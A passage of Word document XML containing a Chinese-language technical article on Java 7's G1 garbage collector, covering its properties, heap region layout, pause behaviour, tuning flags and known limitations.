          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个服务端垃圾回收器，有以下属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　◆并行和并发性：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用了当今硬件中存在的并行性，当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序的线程被停止时，它使用所有可用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（核心，硬件线程等）加速其停止，在停止过程中运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程最小化整个堆栈。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　◆代：和其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HotSpot GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一样，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一代，意味着它在处理新分配的对象（年轻代）和已经生存了一段时间的对象（年老代）时会不同，它主要集中于新对象上的垃圾回收活动，因为它们是最可能回收的，旧对象只是偶尔访问一下，对于大多数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序，代的垃圾回收对于替代方案具有重要优势。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　◆压缩：和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会随时间推移对堆栈进行压缩，压缩消除了潜在的碎片问题，确保长时间运行的操作流畅和一致。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　◆可预测性：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>预测性更佳，这都是由于消除了碎片问题带来的好处，再也没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中停止期间出现的负面影响，另外，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有一个暂停预测模型，允许它满足（或很少超过）暂停时间目标。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java 7 G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　和其它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HotSpot GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相比，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用了一个非常不同的堆栈布局方法，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，年轻代和年老代之间没有物理隔离，相反，它们之间有一个连续的堆栈，被分成大小一样的区域（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>region</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），年轻代可能是一套非连续的区域，年老代也一样，这就允许</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在年轻代和年老代之间灵活地移动资源。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的回收是通过消除暂停发生的，在此期间，幸存者指的是回收集被转移到另一个区域，以便回收区域可以再生，消除暂停是并行的，所有可用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都会参加，大多数消除暂停收集可用的年轻区域，和其它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HotSpot GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的年轻回收是一样的，在暂停期间偶尔也会选择年老区域回收，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在年轻一代回收上还肩负了年老代的回收活动。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相同的是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会定期执行一个并发标记暂停，这个阶段的主要职责是识别哪一个年老区域的垃圾对象是最完整的，因为这些是最有效和最值得回收的，和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同的是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不会执行并发清除暂停，相反，最有用的年老区域是通过并发标记暂停标识的，在随后的消除暂停期间进行回收。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仍然被看做是试验品，可以使用下面两个参数开启它：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-XX:+UnlockExperimentalVMOptions -XX:+UseG1GC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了设置一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暂停时间目标，使用下面的参数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-XX:MaxGCPauseMillis =50  (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暂停时间目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">50ms) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时还可以指定时间间隔，当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暂停持续时间没有上面给出的时间长时可以这么用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-XX:GCPauseIntervalMillis =200  (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暂停间隔目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">200ms) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意上面两个选项表示的目标，没有承诺和保证，在某些情况下它们可能能够工作，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不是总是能够执行它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　另外，年轻代的大小可以明确指定影响消除暂停时间：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-XX:+G1YoungGenSize=512m (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年轻代大小</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>512M) G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也使用幸存空间（可能是非连续的区域），它们的大小可以使用一个常见的参数指定，如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-XX:SurvivorRatio=6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后，为了运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>充分发挥其潜力，尝试设置以下两个默认被禁用了的参数，因为它们可能会暴露一个罕见的竞争状态：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-XX:+G1ParallelRSetUpdatingEnabled   -XX:+G1ParallelRSetScanningEnabled  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意当设置了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-XX:+PrintGCDetails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比起其它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HotSpot GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要啰嗦得</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　多，因为它会打印每个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程的计时和其它有助于进行故障排除的信息，如果你想使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志更简单，请使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-verbosegc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java 7 G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最新进展</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发现在主要集中在遗留的可靠性问题和改善性能，同时也在逐步移除下面的限制：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　◆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不能完全支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具接口（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JVM TI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理扩展（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JMX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），因此关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的监视和管理工具很可能不能正常工作；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　◆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不支持增量永久性代回收，如果一个应用程序产生了许多类转储，需要永久性代回收，这在完整</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>期间是可以实现的；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="00163AD3">
      <w:pPr>
        <w:ind w:firstLine="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>◆从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暂停时间来说，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有时表现比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好有时比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>差。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163AD3" w:rsidRDefault="00163AD3" w:rsidP="00163AD3">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.2.5</w:t>
      </w:r>
      <w:r w:rsidR="00937A28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
